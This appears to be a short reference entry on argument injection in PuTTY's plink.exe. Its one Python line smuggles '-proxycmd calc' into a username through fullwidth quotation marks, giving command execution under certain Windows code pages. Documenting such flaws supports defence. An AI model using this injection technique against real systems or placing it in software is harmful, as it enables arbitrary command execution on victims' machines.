.. /plink.exe

Star

Vendors:

• Putty for Windows

Code Execution

1. You are able to inject -proxycmd to execute arbitrary commands.

   subprocess.run(['plink.exe', 'example.com', '-l', 'user＂ ＂-proxycmd＂ ＂calc'])

   Use case

   If certain parts of the argument(s) are controllable, the attacker can inject additional arguments.

   Code Pages

   125x, 874

Acknowledgements:

• DEVCORE Research Team (@d3vc0r3)